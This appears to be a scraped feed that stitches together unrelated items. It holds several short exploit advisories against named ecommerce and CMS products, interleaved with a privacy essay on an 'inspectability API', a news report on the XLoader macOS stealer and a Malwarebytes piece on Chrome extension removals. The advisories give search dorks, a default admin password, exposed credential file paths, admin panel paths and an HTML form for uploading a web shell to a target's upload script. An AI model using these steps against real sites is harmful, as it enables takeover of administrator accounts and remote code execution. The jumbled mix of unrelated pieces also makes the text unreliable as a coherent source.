FleetCart Laravel Ecommerce System version 1.1.2 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : FleetCart - Laravel Ecommerce System v1.1.2 Insecure Settings Vulnerability                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : https://codecanyon.net/item/fleetcart-laravel-ecommerce-system/23014826?s_rank=175                                 |  | # Dork      : R.I.P                                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave a default administrative account in place post installation.[+] Use Payload : Email: admin@email.com & Password: 123456 [+] Panel : https://127.0.0.1/kingamesro/admin/mediaGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

FleetCart Laravel Ecommerce System 1.1.2 Insecure Settings

FixBook Repair Shop Management Tool version 2.2 suffers from an information leakage vulnerability.

    ====================================================================================================================================| # Title     : FixBook - Repair Shop Management Tool v2.2 Password Hash Disclosure Vulnerability                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/fixbook-repair-shop-management-tool/12333567                                           || # Dork      : R.I.P                                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] Open the source code of the page.[+] Go 2 line 49  found pass of databass encrypted . view-source:http://target_site/repair/update/[+] Here Update admin information : http://127.0.0.1/epbuys.co.uk/repair/update/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

FixBook Repair Shop Management Tool 2.2 Hash Disclosure

Unlike web browsers, mobile apps increasingly make it difficult or impossible to see what companies are really doing with your data. The answer? An inspectability API.

In today’s digital world, injustice lurks in the shadows of the Facebook post that’s delivered to certain groups of people at the exclusion of others, the hidden algorithm used to profile candidates during job interviews, and the risk-assessment algorithms used for criminal sentencing and welfare fraud detention. As algorithmic systems are integrated into every aspect of society, regulatory mechanisms struggle to keep up.

Over the past decade, researchers and journalists have found ways to unveil and scrutinize these discriminatory systems, developing their own data collection tools. As the internet has moved from browsers to mobile apps, however, this crucial transparency is quickly disappearing.

Third-party analysis of digital systems has largely been made possible by two seemingly banal tools that are commonly used to inspect what’s happening on a webpage: browser add-ons and browser developer tools.

Browser add-ons are small programs that can be installed directly onto a web browser, allowing users to augment how they interact with a given website. While add-ons are commonly used to operate tools like password managers and ad-blockers, they are also incredibly useful for enabling people to collect their own data within a tech platform’s walled garden.

Similarly, browser developer tools were made to allow web developers to test and debug their websites’ user interfaces. As the internet evolved and websites became more complex, these tools evolved too, adding features like the ability to inspect and change source code, monitor network activity, and even detect when a website is accessing your location or microphone. These are powerful mechanisms for investigating how companies track, profile, and target their users.

I have put these tools to use as a data journalist to show how a marketing company logged users’ personal data even before they clicked “submit” on a form and, more recently, how the Meta Pixel tool (formerly the Facebook Pixel tool) tracks users without their explicit knowledge in sensitive places such as hospital websites, federal student loan applications, and the websites of tax-filing tools.

In addition to exposing surveillance, browser inspection tools provide a powerful way to crowdsource data to study discrimination, the spread of misinformation, and other types of harms tech companies cause or facilitate. But in spite of these tools’ powerful capabilities, their reach is limited. In 2023, Kepios reported that 92 percent of global users accessed the internet through their smartphones, whereas only 65 percent of global users did so using a desktop or laptop computer.

Though the vast majority of internet traffic has moved to smartphones, we don’t have tools for the smartphone ecosystem that afford the same level of “inspectability” as browser add-ons and developer tools. This is because web browsers are implicitly transparent, while mobile phone operating systems are not.

If you want to view a website in your web browser, the server has to send you the source code. Mobile apps, on the other hand, are compiled, executable files that you usually download from places such as Apple’s iOS App Store or Google Play. App developers don’t need to publish the source code for people to use them.

Similarly, monitoring network traffic on web browsers is trivial. This technique is often more useful than inspecting source code to see what data a company is collecting on users. Want to know which companies a website shares your data with? You’ll want to monitor the network traffic, not inspect the source code. On smartphones, network monitoring is possible, but it usually requires the installation of root certificates that make users’ devices less secure and more vulnerable to man-in-the-middle attacks from bad actors. And these are just some of the differences that make collecting data securely from smartphones much harder than from browsers.

The need for independent collection is more pressing than ever. Previously, company-provided tools such as the Twitter API and Facebook’s CrowdTangle, a tool for monitoring what’s trending on Facebook, were the infrastructure that powered a large portion of research and reporting on social media. However, as these tools become less useful and accessible, new methods of independent data collection are needed to understand what these companies are doing and how people are using their platforms.

To meaningfully report on the impact digital systems have on society, we need to be able to observe what’s taking place on our devices without asking a company for permission. As someone who has spent the past decade building tools that crowdsource data to expose algorithmic harms, I believe the public should have the ability to peek under the hood of their mobile apps and smart devices, just as they can on their browsers. And it’s not just me: The Integrity Institute, a nonprofit working to protect the social internet, recently released a report that lays bare the importance of transparency as a lever to achieve public interest goals like accountability, collaboration, understanding, and trust.

To demand transparency from tech platforms, we need a platform-independent transparency framework, something that I like to call an inspectability API. Such a framework would empower even the most vulnerable populations to capture evidence of harm from their devices while minimizing the risk of their data being used in research or reporting without their consent.

An application programming interface (API) is a way for companies to make their services or data available to other developers. For example, if you’re building a mobile app and want to use the phone’s camera for a specific feature, you would use the iOS or Android Camera API. Another common example is an accessibility API, which allows developers to make their applications accessible to people with disabilities by making the user interface legible to screen readers and other accessibility tools commonly found on modern smartphones and computers. An inspectability API would allow individuals to export data from the apps they use every day and share it with researchers, journalists, and advocates in their communities. Companies could be required to implement this API to adhere to transparency best practices, much as they are required to implement accessibility features to make their apps and websites usable for people with disabilities.

In the US, residents of some states can request the data companies collect on them, thanks to state-level privacy laws. While these laws are well-intentioned, the data that companies share to comply with them is usually structured in a way that obfuscates crucial details that would expose harm. For example, Facebook has a fairly granular data export service that allows individuals to see, amongst other things, their “Off-Facebook activity.” However, as the Markup found during a series of investigations into the use of Pixel, even though Facebook told users which websites were sharing data, it did not reveal just how invasive the information being shared was. Doctor appointments, tax filing information, and student loan information were just some of the things that were being sent to Facebook. An inspectability API would make it easy for people to monitor their devices and see how the apps they use track them in real time.

Some promising work is already being done: Apple’s introduction of the App Privacy Report in iOS 15 marked the first time iPhone users could see detailed privacy information to understand each app’s data collection practices and even answer questions such as, “Is Instagram listening to my microphone?”

But we cannot rely on companies to do this at their discretion—we need a clear framework to define what sort of data should be inspectable and exportable by users, and we need regulation that penalizes companies for not implementing it. Such a framework would not only empower users to expose harms, but also ensure that their privacy is not violated. Individuals could choose what data to share, when, and with whom.

An inspectability API will empower individuals to fight for their rights by sharing the evidence of harm they have been exposed to with people who can raise public awareness and advocate for change. It would enable organizations such as Princeton’s Digital Witness Lab, which I cofounded and lead, to conduct data-driven investigations by collaborating closely with vulnerable communities, instead of relying on tech companies for access. This framework would allow researchers and others to conduct this work in a way that is safe, precise, and, most importantly, prioritizes the consent of the people being harmed.

The Internet Is Turning Into a Data Black Box. An ‘Inspectability API’ Could Crack It Open

A new variant of an Apple macOS malware called XLoader has surfaced in the wild, masquerading its malicious features under the guise of an office productivity app called "OfficeNote."
"The new version of XLoader is bundled inside a standard Apple disk image with the name OfficeNote.dmg," SentinelOne security researchers Dinesh Devadoss and Phil Stokes said in a Monday analysis. "The application

Malware / Endpoint Security

A new variant of an Apple macOS malware called **XLoader** has surfaced in the wild, masquerading its malicious features under the guise of an office productivity app called "OfficeNote."

"The new version of **XLoader** is bundled inside a standard Apple disk image with the name OfficeNote.dmg," SentinelOne security researchers Dinesh Devadoss and Phil Stokes said in a Monday analysis. "The application contained within is signed with the developer signature MAIT JAKHU (54YDV8NU9C)."

XLoader, first detected in 2020, is considered a successor to Formbook and is an information stealer and keylogger offered under the malware-as-a-service (MaaS) model. A macOS variant of the malware emerged in July 2021, distributed as a Java program in the form of a compiled .JAR file.

"Such files require the Java Runtime Environment, and for that reason the malicious .jar file will not execute on a macOS install out of the box, since Apple stopped shipping JRE with Macs over a decade ago," the cybersecurity firm noted at the time.

The latest iteration of XLoader gets around this limitation by switching to programming languages such as C and Objective C, with the disk image file signed on July 17, 2023. Apple has since revoked the signature.

SentinelOne said it detected multiple submissions of the artifact on VirusTotal all through the month of July 2023, indicating a widespread campaign.

"Advertisements on crimeware forums offer the Mac version for rental at $199/month or $299/3 months," the researchers said. "Interestingly, this is relatively expensive compared to Windows variants of XLoader, which go for $59/month and $129/3 months."

Once executed, OfficeNote throws an error message saying it "can't be opened because the original item can't be found," but, in reality, it installs a Launch Agent in the background for persistence.

XLoader is designed to harvest clipboard data as well as information stored in the directories associated with web browsers such as Google Chrome and Mozilla Firefox. Safari, however, is not targeted.

Besides taking steps to evade analysis both manually and by automated solutions, the malware is configured to run sleep commands to delay its execution and avoid raising any red flags.

"XLoader continues to present a threat to macOS users and businesses," the researchers concluded.

"This latest iteration masquerading as an office productivity application shows that the targets of interest are clearly users in a working environment. The malware attempts to steal browser and clipboard secrets that could be used or sold to other threat actors for further compromise."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Variant of XLoader macOS Malware Disguised as 'OfficeNote' Productivity App

Categories: Personal
Tags: chrome

Tags:  browser

Tags:  rogue

Tags:  malicious

Tags:  malware

Tags:  extension

Tags:  remove

Tags:  delete

Tags:  uninstall

We take a look at news that Chrome will soon start asking users if they want to remove outdated extensions.



(Read more...)




The post Chrome will soon start removing extensions that may be unsafe appeared first on Malwarebytes Labs.

Retroactive removals are finally on the way for malicious Chrome browser extensions. Beginning with Chrome 117, Chrome will “proactively highlight to users when an extension they have installed is no longer in the Chrome web store”.

Previously, if you installed an extension which was subsequently unpublished by the developer or removed by Google, the extension you installed would remain in place, even if it was malicious. If, for example, the extension was some sort of data stealer, it would simply continue to steal your data (assuming the infrastructure it sent the data to had not been shut down). 

Now, when an extension is pulled from the web store in one of the following three situations, Chrome users will be notified:

> The extension has been unpublished by the developer.
> 
> The extension has been taken down for violating Chrome Web Store policy.
> 
> The item was marked as malware.

If we’re talking about an “under review” situation, no notification will take place. For example, if a developer is notified that they may have potentially violated one of Google’s policies and has been given time to address or appeal the issue, then a notification will not be triggered.

Violations themselves can result in a wide range of possible outcomes, from immediate suspensions and permanent disabling of extensions to warnings and re-enablement if a violation is addressed to Google’s satisfaction. If the violation involves malware, there’s a good chance there is no way back into Google’s good books. From the violations information page:

> The Chrome Web Store Review team has special procedures for egregious policy violations. In cases such as malware distribution, deceptive behavior designed to evade review, repeated severe violations indicative of malicious intent, and other egregious policy violations, more drastic measures are necessary.
> 
> To limit the potential for these developers to further harm users, the Chrome Web Store team intentionally does not provide details regarding these violations. Additionally, in more severe cases the developer's Chrome Web Store account will be permanently suspended.

In the Privacy and Security settings of Chrome, users will find a “Review” option under the Safety Check setting. It will read as follows:

> Review \[x amount of\] extensions that were taken down from the Chrome web store

Clicking the Review button will take users to their extensions page where they will be given the option to remove all listed extensions. They can also choose to hide the warning and keep the extension if they really want to.

Malware is the exception here though. Extensions flagged as malware are automatically disabled, as they have been in previous versions of Chrome. For everything else, Chrome will state the following:

> Review these extensions that were taken down from the Chrome web store. These extensions might be unsafe. Chrome recommends that you remove them.

Users can select each flagged extension individually, or just hit a “Remove all” button and wipe the lot in one go. If you don’t want to wait for the new feature to roll out in Chrome 117, Bleeping Computer notes that you can give it a try right now by switching on Chrome 116’s experimental "Extensions Module in Safety Check" feature.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Chrome will soon start removing extensions that may be unsafe

Fara Melk Estate CMS version 1.5.0 suffers from an information leakage vulnerability.

    ====================================================================================================================================| # Title     : Fara Melk Estate CMS v1.5.0 unauthorized administrative access Vulnerability                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://www.20script.ir/                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] unauthorized administrative access. allows users to access the administrative interface.[+] Use Payload : /admin-assets/tables.html#[+] http://127.0.0.1/fara/admin-assets/tables.html#Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Fara Melk Estate CMS 1.5.0 Information Disclosure

Evsanati Radyo version 1.0 suffers from a remote shell upload vulnerability.

====================================================================================================================================  
| # Title     : evsanati radyo v1.0 Remote File Upload Vulnerability                                                               |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            |  
| # Vendor    : https://donanimplus.com/b/evsanati-v1-0-radyo-scripti                                                              |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine 

[+] infected file : /upload/yukle.php

[+] Unauthorized administrator access. Allows any visitor to upload malicious files and run them

[+] Some web sites have deleted the upload file so use this code ( note : use after login )

[+] line 5 set your target

<head>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  
</head>

<form action="http://1270.0.0.1/gazipasayalcinemlakcom/upload/yukle.php" method="post" enctype="multipart/form-data">

<div align="center">

<table border="0" cellspacing="0" cellpadding="0">  
  <tr>  
    <td><b>Resmi Secin :</b></td>  
    <td>&nbsp;<input type="file" name="dosya" size="20"></td>  
  </tr>  
  <tr>  
    <td></td>  
    <td><br /><input type="submit" value="Yukle" style="width:220px;"></td>  
  </tr>  
</table>

</div>

</form>

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Evsanati Radyo 1.0 Shell Upload

Event Locations CMS version 1.0.1 suffers from a remote shell upload vulnerability.

    ====================================================================================================================================| # Title     : Event Locations CMS V1.0.1 - unrestricted files upload Vulnerability                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : https://codecanyon.net/item/event-locations-phpmysql-plugin/22100679                                               |  | # Dork      : "/events_edit.php?id="                                                                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Allows any visitor to upload malicious files and run them[+] click 2 creat a Nouveau RDV & in Upload Image box upload your Ev!l .[+] go to http://127.0.0.1/cutgg/assets/uploads/ Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Event Locations CMS 1.0.1 Shell Upload

DoorGets CMS version 7.0 suffers from an information leakage vulnerability.

====================================================================================================================================  
| # Title     : DoorGets CMS v7.0 Sensitive information disclosure Vulnerability                                                   |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               |   
| # Vendor    : https://sourceforge.net/projects/doorgets-cms/files/latest/download?source=directory                               |    
| # Dork      : "Powered with doorGets ™"                                                                                          |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Payload gives you the username and password for the site script manager.

[+] The problem is caused when the installation folder is not deleted by the user .

[+] In this case the developer made a mistake .

    So that after installation, the script does not delete the installation file or notify the user of changing the folder path or deleting it. 

    It also stores the manager's information in temporary files that any visitor can scan and can use this information to the script control panel.

[+] Use Payload : setup/temp/admin.php

[+] it show you login information for admin access .

[+] http://127.0.0.1/watsingschoolacth/v12/setup/temp/admin.php

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

DoorGets CMS 7.0 Information Disclosure

Emaar Real Estate Agency Directory System version 5.7 suffers from a remote shell upload vulnerability.

    ====================================================================================================================================| # Title     : Emaar – Real Estate Agency Directory System v5.7 Unrestricted File Upload Vulnerability                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             | | # Vendor    : https://codecanyon.net/item/emaar-real-estate-agency-directory-system/23200024?s_rank=92                           |  | # Dork      : "© 2019 Emaar. All Rights Reserved."                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Creat new user & login .[+] Go to http://127.0.0.1/theme.meteros.agency/Emaar/Users/Emaar%20company/edit .[+] upload your Ev!l .[+] Uploaded malicious files can be run remotelyGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Tag

#google